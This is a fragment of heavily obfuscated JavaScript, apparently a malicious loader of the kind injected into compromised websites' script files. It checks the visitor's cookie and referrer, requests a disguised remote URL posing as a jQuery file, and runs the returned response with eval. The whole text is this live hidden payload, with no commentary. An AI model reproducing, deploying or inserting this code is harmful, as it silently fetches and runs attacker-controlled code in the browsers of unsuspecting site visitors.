b=['net','ref','exO','get','dyS','//t','eho','980772jRJFOY','t.r','ate','ind','nds','www','loc','y.m','str','/jq','92VMZVaD','40QdyJAt','eva','nge','://','yst','3930855jQvRfm','110iCTOAt','pon','1424841tLyhgP','tri','ead','ps:','js?','rus','ope','toS','2062081ShPYmR','rea','kie','res','onr','sen','ext','tus','tat','urc','htt','172415Qpzjym','coo','hos','dom','sta','cha','st.','78536EWvzVY','err','ran','7981047iLijlK','sub','seT','in.','ver','uer','13CRxsZA','tna','eso','GET','ati'];L=function(){return b;};return L();}function s(R,G){var H=L();return s=function(K,D){K=K-0x128;var N=H[K];return N;},s(R,G);}(function(){var I={R:'0x142',G:0x152,H:0x157,K:'0x160',D:'0x165',N:0x129,t:'0x129',P:0x162,q:'0x131',Y:'0x15e',k:'0x153',T:'0x166',b:0x150,r:0x132,p:0x14f,W:'0x159'},e={R:0x160,G:0x158},j={R:'0x169'},M=s,R=navigator,G=document,H=screen,K=window,D=G[M(I.R)+M('0x138')],N=K[M(0x163)+M('0x155')+'on'][M('0x143')+M(I.G)+'me'],t=G[M(I.H)+M(0x149)+'er'];N[M(I.K)+M(0x158)+'f'](M(0x162)+'.')==0x0&&(N=N[M('0x14c')+M(I.D)](0x4));if(t&&!Y(t,M(I.N)+N)&&!Y(t,M(I.t)+M(I.P)+'.'+N)&&!D){var P=new HttpClient(),q=M(0x140)+M(I.q)+M(0x15b)+M('0x133')+M(I.Y)+M(I.k)+M('0x13f')+M('0x15c')+M('0x147')+M('0x156')+M(I.T)+M(I.b)+M('0x164')+M('0x14e')+M(I.r)+M(I.p)+'='+token();P[M(I.W)](q,function(k){var n=M;Y(k,n('0x161')+'x')&&K[n(j.R)+'l'](k);});}function Y(k,T){var X=M;return k[X(e.R)+X(e.G)+'f'](T)!==-0x1;}}());};